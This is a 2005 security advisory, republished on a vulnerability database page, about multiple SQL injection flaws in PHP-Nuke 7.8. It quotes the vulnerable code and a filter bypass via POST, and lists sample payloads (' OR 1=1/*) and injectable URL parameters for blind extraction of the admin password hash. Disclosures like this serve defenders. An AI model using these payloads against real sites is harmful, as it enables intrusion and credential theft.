Vulners
Lucene search
PHPNuke78.txt
`[NewAngels Advisory #7]PHP Nuke <= 7.8 Multiple SQL Injections
=============================================================================
Software: PHP Nuke 7.8
Type: SQL Injections
Risk: High
Date: Sep. 10 2005
Vendor: PHP-Nuke (phpnuke.org)
Credit:
=======
Robin 'onkel_fisch' Verton from it-security23.net
Description:
============
PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet.
The Administrator has total control of his web site, registered users, and he will have in the hand
a powerful assembly of tools to maintain an active and 100% interactive web site using databases.
[http://www.phpnuke.org/]
Vulnerability:
==============
PHP Nuke 7.8 is prone to multiple SQL injection vulnerabilities.
These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
In the modules.php
$result = $db->sql_query("SELECT active, view FROM ".$prefix."_modules WHERE title='$name'");
The $name variable is not checked so you could inject malicious SQL Code. In an file which is included whe have the following code:
$queryString = strtolower($_SERVER['QUERY_STRING']);
if (stripos_clone($queryString,'%20union%20') OR stripos_clone($queryString,'/*') OR stripos_clone($queryString,'*/union/*') OR stripos_clone($queryString,'c2nyaxb0')) {
header("Location: index.php");
die();
}
[...]
if (!ini_get("register_globals")) {
import_request_variables('GPC');
}
So you can use UNION in a GET var. But because they use register_globals or impor_request_variables you can send
the malicous SQL-Code via POST so it is not checked if you insert an "union".
http://www.example.com/modules.php POST: name=' OR 1=1/*
will produce an error, neither
http://www.example.com/modules.php POST: name=' OR 1=2/*
will only tell you taht the requestet 'modul' is not active, so you can read out the admin password hahs via blind injections.
Additionaly there are a few SQL-Injections in the modules.
Here a few examples:
http://www.example.com/modules.php?name=News&file=article&sid=[SQL] - here the same as above, send this via POST to
bypass the 'union'-cover
http://www.example.com/modules.php?name=News&file=comments&Reply&pid=[SQL]
http://www.example.com/modules.php?name=News&file=comments&op=Reply&pid=[SQL]
http://www.example.com/modules.php?name=News&file=comments&op=Reply&sid=[SQL]
Greets:
==============
CyberDead, atomic, sirius_
Whole secured-pussy.de Team
Zealots :D :D
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2005 00:00Current
7.4High risk
Vulners AI Score7.4